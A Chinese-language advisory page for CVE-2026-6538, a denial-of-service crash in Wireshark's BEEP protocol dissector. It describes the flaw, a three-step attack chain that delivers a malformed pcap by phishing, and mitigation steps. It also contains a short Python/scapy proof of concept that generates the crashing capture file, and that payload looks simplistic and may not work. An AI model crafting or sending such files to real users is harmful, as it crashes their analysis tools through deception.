CVE-2026-6538 CVSS 5.5 中危

CVE-2026-6538 Wireshark BEEP协议拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6538

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark 4.6.0至4.6.4及4.4.0至4.4.14版本的BEEP协议解析器存在崩溃漏洞。攻击者可诱导用户打开包含恶意数据包的文件，导致解析器崩溃进而引发拒绝服务。

技术细节

该漏洞主要源于Wireshark BEEP协议解析器在处理特定畸形数据包时存在逻辑缺陷。由于未对数据包的头部或载荷长度进行充分的边界检查，当解析器遇到异常构造的BEEP报文时，会触发空指针解引用或内存越界访问。攻击向量为本地（AV:L）且需要用户交互（UI:R），攻击者需利用社会工程学手段，诱导受害者使用受漏洞影响的Wireshark版本打开包含恶意数据包的pcap文件。一旦受害者尝试解析该流量，Wireshark进程将立即崩溃，导致分析服务不可用。该漏洞主要影响可用性（A:H），不影响数据的机密性和完整性。

攻击链分析

STEP 1

步骤1: 构造恶意数据

攻击者分析BEEP协议格式，构造包含畸形头部或异常载荷长度的恶意数据包。

STEP 2

步骤2: 诱导用户交互

将恶意数据包封装为pcap文件，通过钓鱼邮件或文件共享诱导受害者下载。

STEP 3

步骤3: 触发拒绝服务

受害者使用存在漏洞的Wireshark版本打开文件，解析器处理异常数据时崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# Proof of Concept for CVE-2026-6538 (Wireshark BEEP Dissector Crash)
# This script generates a malformed BEEP packet that may crash the dissector.
# Usage: python3 poc.py -w crash.pcap

from scapy.all import *

# Define a malformed BEEP packet
# BEEP typically runs over TCP. We craft a TCP packet with a payload that mimics
# a broken BEEP header to trigger the parsing logic error.

malformed_payload = b"MSG 0 1 . 0 0" + b"\x00" * 100  # Invalid header structure

ip = IP(dst="127.0.0.1")
tcp = TCP(sport=12345, dport=10288, flags="PA")

# Craft the packet
packet = ip/tcp/malformed_payload

# Save to pcap file
wrpcap("crash_beeper.pcap", [packet])

print("[+] Malformed pcap file 'crash_beeper.pcap' generated.")
print("[+] Open this file in a vulnerable Wireshark version to trigger the crash.")

影响范围

Wireshark 4.4.0 - 4.4.14

Wireshark 4.6.0 - 4.6.4

防御指南

临时缓解措施

建议用户立即升级至修复后的版本。如果无法立即升级，应谨慎处理来源不明的流量捕获文件，或者在Wireshark中暂时禁用BEEP协议解析器（Analyze -> Enabled Protocols -> 搜索BEEP并取消勾选），以防止解析器处理恶意流量导致崩溃。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表